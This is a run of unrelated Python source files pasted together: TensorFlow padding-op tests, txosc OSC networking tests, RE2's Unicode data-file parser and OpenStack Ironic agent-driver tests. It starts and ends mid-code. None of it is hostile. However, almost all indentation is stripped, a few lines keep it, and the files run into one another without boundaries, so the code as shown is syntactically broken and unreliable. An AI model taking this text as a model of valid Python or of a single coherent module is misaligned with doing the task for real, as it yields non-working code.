constant_values=constant_values)
def testInputDims(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2, 1, 1, 1, 1]),
array_ops.reshape(
[1, 2], shape=[1, 2]))
def testPaddingsDim(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[2]))
def testPaddingsDim2(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[2, 1]))
def testPaddingsDim3(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[1, 2]))
def testPaddingsDim4(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2, 3, 4, 5, 6], shape=[3, 2]))
def testPaddingsNonNegative(self):
with self.session(use_gpu=True):
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
array_ops.pad(constant_op.constant(
[1], shape=[1]),
constant_op.constant(
[-1, 0], shape=[1, 2]))
def testPaddingsNonNegative2(self):
with self.session(use_gpu=True):
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
array_ops.pad(constant_op.constant(
[1], shape=[1]),
constant_op.constant(
[-1, 0], shape=[1, 2]))
def testPaddingsMaximum(self):
with self.session(use_gpu=True):
with self.assertRaises(Exception):
array_ops.pad(constant_op.constant(
[1], shape=[2]),
constant_op.constant(
[2, 0], shape=[1, 2]),
mode="REFLECT").eval()
with self.assertRaises(Exception):
array_ops.pad(constant_op.constant(
[1], shape=[2]),
constant_op.constant(
[0, 3], shape=[1, 2]),
mode="SYMMETRIC").eval()
def testInvalid(self):
with self.cached_session():
x = [[1, 2, 3], [4, 5, 6]]
with self.assertRaisesRegexp(ValueError, "Unknown padding mode"):
array_ops.pad(x, [[1, 0], [2, 1]], mode="weird").eval()
def testPaddingTypes(self):
paddings = [[1, 0], [2, 3], [0, 2]]
inputs = np.random.randint(-100, 100, (4, 4, 3)).astype(np.float32)
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC", "reflect", "symmetric",
"constant"):
for padding_dtype in [dtypes.int32, dtypes.int64]:
np_val = self._npPad(inputs,
paddings,
mode=mode,
constant_values=0)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(inputs,
constant_op.constant(paddings, padding_dtype),
mode=mode,
constant_values=0)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def testIntTypes(self):
# TODO(touts): Figure out why the padding tests do not work on GPU
# for int types and rank > 2.
for t in [np.int8, np.int32, np.int64]:
self._testAll(
np.random.randint(-100, 100, (4, 4, 3)).astype(t),
[[1, 0], [2, 3], [0, 2]], 0)
self._testAll(
np.random.randint(-100, 100, (4, 2, 1, 3)).astype(t),
[[0, 0], [0, 0], [0, 0], [0, 0]], -123)
def testFloatTypes(self):
for t in [np.float32, np.float64]:
self._testAll(np.random.rand(2, 5).astype(t), [[1, 0], [2, 0]], 0.0)
self._testAll(np.random.rand(2, 3, 4).astype(t),
[[0, 0], [0, 0], [0, 0]], -1234.0)
self._testAll(np.random.rand(0, 3, 4).astype(t),
[[0, 0], [2, 1], [2, 3]], 0.0)
def testComplexTypes(self):
for t in [np.complex64, np.complex128]:
x = np.random.rand(2, 5).astype(t)
self._testAll(x + 1j * x, [[1, 0], [2, 0]], 1234.0 - 1234.0j)
x = np.random.rand(3, 2, 1, 1).astype(t)
self._testAll(x + 1j * x, [[0, 0], [0, 0], [0, 0], [0, 0]], 0 + 0j)
def testString(self):
# Numpy does not support padding strings so we compare padding manually.
x = ops.convert_to_tensor([["Hello", "World"],
["Goodnight", "Moon"]])
constant = array_ops.pad(x, [[1, 0], [0, 1]], mode="CONSTANT",
constant_values="PAD")
reflect = array_ops.pad(x, [[1, 0], [0, 1]], mode="REFLECT",
constant_values="PAD")
symmetric = array_ops.pad(x, [[1, 0], [0, 1]], mode="SYMMETRIC",
constant_values="PAD")
with self.session(use_gpu=True):
self.assertAllEqual([[b"PAD", b"PAD", b"PAD"],
[b"Hello", b"World", b"PAD"],
[b"Goodnight", b"Moon", b"PAD"]], constant.eval())
self.assertAllEqual([[b"Goodnight", b"Moon", b"Goodnight"],
[b"Hello", b"World", b"Hello"],
[b"Goodnight", b"Moon", b"Goodnight"]],
reflect.eval())
self.assertAllEqual([[b"Hello", b"World", b"World"],
[b"Hello", b"World", b"World"],
[b"Goodnight", b"Moon", b"Moon"]], symmetric.eval())
def testShapeFunctionEdgeCases(self):
# Unknown paddings shape.
inp = constant_op.constant(0.0, shape=[4, 4, 4, 4])
padded = array_ops.pad(inp, array_ops.placeholder(dtypes.int32))
self.assertEqual([None, None, None, None], padded.get_shape().as_list())
# Unknown input shape.
inp = array_ops.placeholder(dtypes.float32)
padded = array_ops.pad(inp, [[2, 2], [2, 2]])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input and paddings shape.
inp = array_ops.placeholder(dtypes.float32)
padded = array_ops.pad(inp, array_ops.placeholder(dtypes.int32))
self.assertAllEqual(None, padded.get_shape().ndims)
def testPartialShapeInformation(self):
unknown = array_ops.placeholder(dtypes.int32)
# Known input shape, partial unknown padding (one dimension).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[1, 2], unknown])
self.assertEqual([7, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[unknown, 0], [1, 2]])
self.assertEqual([None, 7], padded.get_shape().as_list())
# Known input shape, partial unknown padding (end).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[1, 2], [0, unknown]])
self.assertEqual([7, None], padded.get_shape().as_list())
# Unknown input shape, partial unknown padding (one dimension).
padded = array_ops.pad(unknown, [[1, 2], unknown])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input shape (rank known), partial unknown padding (one dimension).
rank_known = array_ops.placeholder(dtypes.int32)
rank_known.set_shape([None, None])
padded = array_ops.pad(rank_known, [[1, 2], unknown])
self.assertEqual([None, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin), with constant begin.
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[constant_op.constant(1, shape=[]), 2],
[0, unknown]])
self.assertEqual([7, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin), with constant dim.
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp,
[constant_op.constant(1, shape=[2]), [0, unknown]])
self.assertEqual([6, None], padded.get_shape().as_list())
# Zero padding on a known dimension.
inp = array_ops.placeholder(dtypes.int32, [None, None, 20])
padded = array_ops.pad(inp, [[0, 0], [0, unknown], [0, 0]])
self.assertEqual([None, None, 20], padded.get_shape().as_list())
def testScalars(self):
paddings = np.zeros((0, 2), dtype=np.int32)
inp = np.asarray(7)
with self.session(use_gpu=True):
tf_val = array_ops.pad(inp, paddings)
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
def testPadTypes(self):
for dtype in [dtypes.int32, dtypes.int64]:
paddings = np.zeros((0, 2))
inp = np.asarray(7)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(inp, constant_op.constant(paddings, dtype=dtype))
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
def testCollapseAdjacentNonPaddedDimensions(self):
# pyformat: disable
paddings_values = [[[0, 0], [0, 0], [0, 0], [0, 1]],
[[0, 0], [2, 3], [0, 0], [0, 0]],
[[0, 0], [0, 0], [0, 0], [0, 0]]]
# pyformat: enable
for paddings_value in paddings_values:
for dtype in [dtypes.float32, dtypes.int32]:
inp = constant_op.constant(1, shape=[8, 28, 28, 3], dtype=dtype)
paddings = constant_op.constant(paddings_value, dtype=dtypes.int32)
padded = array_ops.pad(inp, paddings)
middle = array_ops.slice(padded, [row[0] for row in paddings_value],
[dim.value for dim in inp.shape.dims])
left = array_ops.slice(padded, [0, 0, 0, 0],
[row[0] for row in paddings_value])
right = array_ops.slice(
padded,
[paddings_value[i][0] + inp.shape.dims[i].value for i in range(4)],
[-1, -1, -1, -1])
with self.cached_session(use_gpu=True):
self.assertAllEqual(inp.eval(), middle.eval())
self.assertAllEqual(
np.zeros([row[0] for row in paddings_value]), left.eval())
self.assertAllEqual(
np.zeros([row[1] for row in paddings_value]), right.eval())
if __name__ == "__main__":
test.main()
# Copyright (c) 2009 Alexandre Quessy, Arjan Scherpenisse
# See LICENSE for details.
"""
Tests for txosc/async.py
Maintainer: Arjan Scherpenisse
"""
from twisted.trial import unittest
from twisted.internet import reactor, defer, task
from txosc import osc
from txosc import async
from txosc import dispatch
class ClientServerTests(object):
"""
Common class for the L{TestUDPClientServer} and
L{TestTCPClientServer} for shared test functions.
"""
def testSingleMessage(self):
pingMsg = osc.Message("/ping")
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
self.receiver.addCallback("/ping", ping)
self._send(pingMsg)
return d
def testBundle(self):
pingMsg = osc.Message("/ping")
bundle = osc.Bundle()
bundle.add(osc.Message("/pong"))
bundle.add(pingMsg)
bundle.add(osc.Message("/foo/bar", 1, 2))
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
d2 = defer.Deferred()
def foo(m, addr):
self.assertEquals(m, osc.Message("/foo/bar", 1, 2))
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver.addCallback("/foo/*", foo)
self._send(bundle)
return defer.DeferredList([d, d2])
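# The concrete transport test cases below mix in ClientServerTests so the
# same message and bundle assertions run over UDP, multicast UDP and TCP.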
class TestUDPClientServer(unittest.TestCase, ClientServerTests):
"""
Test the L{osc.Sender} and L{dispatch.Receiver} over UDP via localhost.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenUDP(17778, async.DatagramServerProtocol(self.receiver))
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening(), self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("127.0.0.1", 17778))
class TestMulticastClientServer(unittest.TestCase):
"""
Test the L{osc.Sender} and two L{dispatch.Receiver} over Multicast UDP via 224.0.0.1.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenMulticast(17778, async.MulticastDatagramServerProtocol(self.receiver, "224.0.0.1"), listenMultiple=True)
self.receiver2 = dispatch.Receiver()
self.serverPort2 = reactor.listenMulticast(17778, async.MulticastDatagramServerProtocol(self.receiver2, "224.0.0.1"), listenMultiple=True)
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def testSingleMessage(self):
pingMsg = osc.Message("/ping")
d = defer.Deferred()
d2 = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
def ping2(m, addr):
self.assertEquals(m, pingMsg)
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver2.addCallback("/ping", ping2)
self._send(pingMsg)
return defer.DeferredList([d, d2])
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening(), self.serverPort2.stopListening(), self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("224.0.0.1", 17778))
class TestTCPClientServer(unittest.TestCase, ClientServerTests):
"""
    Test the L{osc.Sender} and L{dispatch.Receiver} over TCP via localhost.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenTCP(17778, async.ServerFactory(self.receiver))
self.client = async.ClientFactory()
self.clientPort = reactor.connectTCP("localhost", 17778, self.client)
return self.client.deferred
def tearDown(self):
self.clientPort.transport.loseConnection()
return defer.DeferredList([self.serverPort.stopListening()])
def _send(self, element):
self.client.send(element)
class TestReceiverWithExternalClient(unittest.TestCase):
"""
This test needs python-liblo.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenUDP(17778, async.DatagramServerProtocol(self.receiver))
self.target = liblo.Address(17778)
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening()])
def testSingleMessage(self):
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, osc.Message("/ping"))
d.callback(True)
self.receiver.addCallback("/ping", ping)
liblo.send(self.target, "/ping")
return d
def testBundle(self):
d = defer.Deferred()
d2 = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, osc.Message("/ping"))
d.callback(True)
def pong(m, addr):
self.assertEquals(m, osc.Message("/pong", 1, 2, "string"))
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver.addCallback("/po*", pong)
b = liblo.Bundle()
b.add("/ping")
b.add("/pong", 1, 2, "string")
liblo.send(self.target, b)
return defer.DeferredList([d, d2])
class TestClientWithExternalReceiver(unittest.TestCase):
"""
This test needs python-liblo.
"""
timeout = 1
def setUp(self):
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def tearDown(self):
return defer.DeferredList([self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("127.0.0.1", 17778))
def testSingleMessage(self):
        server = liblo.Server(17778)  # must match the port used by _send
        server.start()
        # Mutable cell: the callback assigns into it so the outer loop can
        # observe the change (Python 2 closures cannot rebind outer locals).
        received = [False]
        def ping_callback(path, args):
            received[0] = True
        server.add_method("/ping", '', ping_callback)
        self._send(osc.Message("/ping"))
        while not received[0]:
            server.recv(100)
try:
import liblo
except ImportError:
TestReceiverWithExternalClient.skip = "pyliblo not installed"
TestClientWithExternalReceiver.skip = "FIXME: liblo server does not run with twisted"
#FIXME: yes it does. see rats.osc in Toonloop 1.2
# Copyright 2008 The RE2 Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Parser for Unicode data files (as distributed by unicode.org)."""
import os
import re
import urllib2
# Directory or URL where Unicode tables reside.
_UNICODE_DIR = "http://www.unicode.org/Public/8.0.0/ucd"
# Largest valid Unicode code value.
_RUNE_MAX = 0x10FFFF
class Error(Exception):
"""Unicode error base class."""
class InputError(Error):
"""Unicode input error class. Raised on invalid input."""
def _UInt(s):
"""Converts string to Unicode code point ('263A' => 0x263a).
Args:
s: string to convert
Returns:
Unicode code point
Raises:
InputError: the string is not a valid Unicode value.
"""
try:
v = int(s, 16)
except ValueError:
v = -1
if len(s) < 4 or len(s) > 6 or v < 0 or v > _RUNE_MAX:
raise InputError("invalid Unicode value %s" % (s,))
return v
def _URange(s):
"""Converts string to Unicode range.
'0001..0003' => [1, 2, 3].
'0001' => [1].
Args:
s: string to convert
Returns:
Unicode range
Raises:
InputError: the string is not a valid Unicode range.
"""
a = s.split("..")
if len(a) == 1:
return [_UInt(a[0])]
if len(a) == 2:
lo = _UInt(a[0])
hi = _UInt(a[1])
if lo < hi:
return range(lo, hi + 1)
raise InputError("invalid Unicode range %s" % (s,))
def _UStr(v):
"""Converts Unicode code point to hex string.
0x263a => '0x263A'.
Args:
v: code point to convert
Returns:
Unicode string
Raises:
InputError: the argument is not a valid Unicode value.
"""
if v < 0 or v > _RUNE_MAX:
raise InputError("invalid Unicode value %s" % (v,))
return "0x%04X" % (v,)
def _ParseContinue(s):
"""Parses a Unicode continuation field.
These are of the form '<Name, First>' or '<Name, Last>'.
Instead of giving an explicit range in a single table entry,
some Unicode tables use two entries, one for the first
code value in the range and one for the last.
The first entry's description is '<Name, First>' instead of 'Name'
and the second is '<Name, Last>'.
'<Name, First>' => ('Name', 'First')
'<Name, Last>' => ('Name', 'Last')
'Anything else' => ('Anything else', None)
Args:
s: continuation field string
Returns:
pair: name and ('First', 'Last', or None)
"""
match = re.match("<(.*), (First|Last)>", s)
if match is not None:
return match.groups()
return (s, None)
def ReadUnicodeTable(filename, nfields, doline):
"""Generic Unicode table text file reader.
The reader takes care of stripping out comments and also
parsing the two different ways that the Unicode tables specify
code ranges (using the .. notation and splitting the range across
multiple lines).
Each non-comment line in the table is expected to have the given
number of fields. The first field is known to be the Unicode value
and the second field its description.
The reader calls doline(codes, fields) for each entry in the table.
  If doline raises an exception, the reader prints that exception,
  prefixed with the file name and line number, and re-raises it.
Arguments:
filename: the Unicode data file to read, or a file-like object.
nfields: the number of expected fields per line in that file.
doline: the function to call for each table entry.
Raises:
InputError: nfields is invalid (must be >= 2).
"""
if nfields < 2:
raise InputError("invalid number of fields %d" % (nfields,))
if type(filename) == str:
if filename.startswith("http://"):
fil = urllib2.urlopen(filename)
else:
fil = open(filename, "r")
else:
fil = filename
first = None # first code in multiline range
expect_last = None # tag expected for "Last" line in multiline range
lineno = 0 # current line number
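  # first/expect_last form a small state machine: a "<Name, First>" entry
  # arms it, and the matching "<Name, Last>" entry closes the range and
  # emits one synthesized table entry.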
for line in fil:
lineno += 1
try:
# Chop # comments and white space; ignore empty lines.
sharp = line.find("#")
if sharp >= 0:
line = line[:sharp]
line = line.strip()
if not line:
continue
# Split fields on ";", chop more white space.
# Must have the expected number of fields.
fields = [s.strip() for s in line.split(";")]
if len(fields) != nfields:
raise InputError("wrong number of fields %d %d - %s" %
(len(fields), nfields, line))
# The Unicode text files have two different ways
# to list a Unicode range. Either the first field is
# itself a range (0000..FFFF), or the range is split
# across two lines, with the second field noting
# the continuation.
codes = _URange(fields[0])
(name, cont) = _ParseContinue(fields[1])
if expect_last is not None:
# If the last line gave the First code in a range,
# this one had better give the Last one.
if (len(codes) != 1 or codes[0] <= first or
cont != "Last" or name != expect_last):
raise InputError("expected Last line for %s" %
(expect_last,))
codes = range(first, codes[0] + 1)
first = None
expect_last = None
fields[0] = "%04X..%04X" % (codes[0], codes[-1])
fields[1] = name
elif cont == "First":
# Otherwise, if this is the First code in a range,
# remember it and go to the next line.
if len(codes) != 1:
raise InputError("bad First line: range given")
expect_last = name
first = codes[0]
continue
doline(codes, fields)
except Exception, e:
print "%s:%d: %s" % (filename, lineno, e)
raise
if expect_last is not None:
raise InputError("expected Last line for %s; got EOF" %
(expect_last,))
def CaseGroups(unicode_dir=_UNICODE_DIR):
"""Returns list of Unicode code groups equivalent under case folding.
Each group is a sorted list of code points,
and the list of groups is sorted by first code point
in the group.
Args:
unicode_dir: Unicode data directory
Returns:
list of Unicode code groups
"""
# Dict mapping lowercase code point to fold-equivalent group.
togroup = {}
def DoLine(codes, fields):
"""Process single CaseFolding.txt line, updating togroup."""
(_, foldtype, lower, _) = fields
if foldtype not in ("C", "S"):
return
lower = _UInt(lower)
togroup.setdefault(lower, [lower]).extend(codes)
ReadUnicodeTable(unicode_dir+"/CaseFolding.txt", 4, DoLine)
groups = togroup.values()
for g in groups:
g.sort()
groups.sort()
  return groups
def Scripts(unicode_dir=_UNICODE_DIR):
"""Returns dict mapping script names to code lists.
Args:
unicode_dir: Unicode data directory
Returns:
dict mapping script names to code lists
"""
scripts = {}
def DoLine(codes, fields):
"""Process single Scripts.txt line, updating scripts."""
(_, name) = fields
scripts.setdefault(name, []).extend(codes)
ReadUnicodeTable(unicode_dir+"/Scripts.txt", 2, DoLine)
return scripts
def Categories(unicode_dir=_UNICODE_DIR):
"""Returns dict mapping category names to code lists.
Args:
unicode_dir: Unicode data directory
Returns:
dict mapping category names to code lists
"""
categories = {}
def DoLine(codes, fields):
"""Process single UnicodeData.txt line, updating categories."""
category = fields[2]
categories.setdefault(category, []).extend(codes)
# Add codes from Lu into L, etc.
if len(category) > 1:
short = category[0]
categories.setdefault(short, []).extend(codes)
ReadUnicodeTable(unicode_dir+"/UnicodeData.txt", 15, DoLine)
return categories
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import types
import mock
from oslo_config import cfg
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common import image_service
from ironic.common import images
from ironic.common import raid
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import fake
from ironic.drivers.modules import pxe
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as object_utils
INSTANCE_INFO = db_utils.get_test_agent_instance_info()
DRIVER_INFO = db_utils.get_test_agent_driver_info()
DRIVER_INTERNAL_INFO = db_utils.get_test_agent_driver_internal_info()
CONF = cfg.CONF
class TestAgentMethods(db_base.DbTestCase):
def setUp(self):
super(TestAgentMethods, self).setUp()
self.node = object_utils.create_test_node(self.context,
driver='fake_agent')
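        # Reset the cached DHCP provider so each test resolves it afresh.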
dhcp_factory.DHCPFactory._dhcp_provider = None
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_image(self, glance_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = True
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare'}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service, 'GlanceImageService', autospec=True)
def test_build_instance_info_for_deploy_glance_partition_image(
self, glance_mock, parse_instance_info_mock):
i_info = self.node.instance_info
i_info['image_source'] = '733d1c44-a2ea-414b-aca7-69decf20d810'
i_info['kernel'] = '13ce5a56-1de3-4916-b8b2-be778645d003'
i_info['ramdisk'] = 'a5a370a8-1b39-433f-be63-2c7d708e4b4e'
i_info['root_gb'] = 5
i_info['swap_mb'] = 4
i_info['ephemeral_gb'] = 0
i_info['ephemeral_format'] = None
i_info['configdrive'] = 'configdrive'
driver_internal_info = self.node.driver_internal_info
driver_internal_info['is_whole_disk_image'] = False
self.node.driver_internal_info = driver_internal_info
self.node.instance_info = i_info
self.node.save()
image_info = {'checksum': 'aa', 'disk_format': 'qcow2',
'container_format': 'bare',
'properties': {'kernel_id': 'kernel',
'ramdisk_id': 'ramdisk'}}
glance_mock.return_value.show = mock.MagicMock(spec_set=[],
return_value=image_info)
glance_obj_mock = glance_mock.return_value
glance_obj_mock.swift_temp_url.return_value = 'temp-url'
parse_instance_info_mock.return_value = {'swap_mb': 4}
image_source = '733d1c44-a2ea-414b-aca7-69decf20d810'
expected_i_info = {'root_gb': 5,
'swap_mb': 4,
'ephemeral_gb': 0,
'ephemeral_format': None,
'configdrive': 'configdrive',
'image_source': image_source,
'image_url': 'temp-url',
'kernel': 'kernel',
'ramdisk': 'ramdisk',
'image_type': 'partition',
'image_checksum': 'aa',
'fake_password': 'fakepass',
'image_container_format': 'bare',
'image_disk_format': 'qcow2',
'foo': 'bar'}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
glance_mock.assert_called_once_with(version=2,
context=task.context)
glance_mock.return_value.show.assert_called_once_with(
self.node.instance_info['image_source'])
glance_mock.return_value.swift_temp_url.assert_called_once_with(
image_info)
image_type = task.node.instance_info.get('image_type')
self.assertEqual('partition', image_type)
self.assertEqual('kernel', info.get('kernel'))
self.assertEqual('ramdisk', info.get('ramdisk'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_image(
self, validate_href_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
        i_info['image_source'] = 'http://image-ref'
        i_info['image_checksum'] = 'aa'
        i_info['root_gb'] = 10
driver_internal_info['is_whole_disk_image'] = True
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
@mock.patch.object(deploy_utils, 'parse_instance_info', autospec=True)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonglance_partition_image(
self, validate_href_mock, parse_instance_info_mock):
i_info = self.node.instance_info
driver_internal_info = self.node.driver_internal_info
i_info['image_source'] = 'http://image-ref'
i_info['kernel'] = 'http://kernel-ref'
i_info['ramdisk'] = 'http://ramdisk-ref'
i_info['image_checksum'] = 'aa'
i_info['root_gb'] = 10
driver_internal_info['is_whole_disk_image'] = False
self.node.instance_info = i_info
self.node.driver_internal_info = driver_internal_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
validate_href_mock.side_effect = ['http://image-ref',
'http://kernel-ref',
'http://ramdisk-ref']
parse_instance_info_mock.return_value = {'swap_mb': 5}
expected_i_info = {'image_source': 'http://image-ref',
'image_url': 'http://image-ref',
'image_type': 'partition',
'kernel': 'http://kernel-ref',
'ramdisk': 'http://ramdisk-ref',
'image_checksum': 'aa',
'root_gb': 10,
'swap_mb': 5,
'fake_password': 'fakepass',
'foo': 'bar'}
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
info = agent.build_instance_info_for_deploy(task)
self.assertEqual(self.node.instance_info['image_source'],
info['image_url'])
validate_href_mock.assert_called_once_with(
mock.ANY, 'http://image-ref')
self.assertEqual('partition', info.get('image_type'))
self.assertEqual(expected_i_info, info)
parse_instance_info_mock.assert_called_once_with(task.node)
@mock.patch.object(image_service.HttpImageService, 'validate_href',
autospec=True)
def test_build_instance_info_for_deploy_nonsupported_image(
self, validate_href_mock):
validate_href_mock.side_effect = iter(
[exception.ImageRefValidationFailed(
image_href='file://img.qcow2', reason='fail')])
i_info = self.node.instance_info
i_info['image_source'] = 'file://img.qcow2'
i_info['image_checksum'] = 'aa'
self.node.instance_info = i_info
self.node.save()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(
self.context, self.node.uuid, shared=False) as task:
self.assertRaises(exception.ImageRefValidationFailed,
agent.build_instance_info_for_deploy, task)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size(self, show_mock):
show_mock.return_value = {
'size': 10 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_without_memory_mb(self, show_mock):
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties.pop('memory_mb', None)
agent.check_image_size(task, 'fake-image')
self.assertFalse(show_mock.called)
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail(self, show_mock):
show_mock.return_value = {
'size': 11 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_fail_by_agent_consumed_memory(self, show_mock):
self.config(memory_consumed_by_agent=2, group='agent')
show_mock.return_value = {
'size': 9 * 1024 * 1024,
'disk_format': 'qcow2',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
self.assertRaises(exception.InvalidParameterValue,
agent.check_image_size,
task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_enabled(self, show_mock):
CONF.set_override('stream_raw_images', True, 'agent')
# Image is bigger than memory but it's raw and will be streamed
# so the test should pass
show_mock.return_value = {
'size': 15 * 1024 * 1024,
'disk_format': 'raw',
}
mgr_utils.mock_the_extension_manager(driver='fake_agent')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.node.properties['memory_mb'] = 10
agent.check_image_size(task, 'fake-image')
show_mock.assert_called_once_with(self.context, 'fake-image')
@mock.patch.object(images, 'image_show', autospec=True)
def test_check_image_size_raw_stream_disabled(self, show_mock):
CONF.set_override('stream_raw_images', False, 'agent')
show_mock.return_value = {
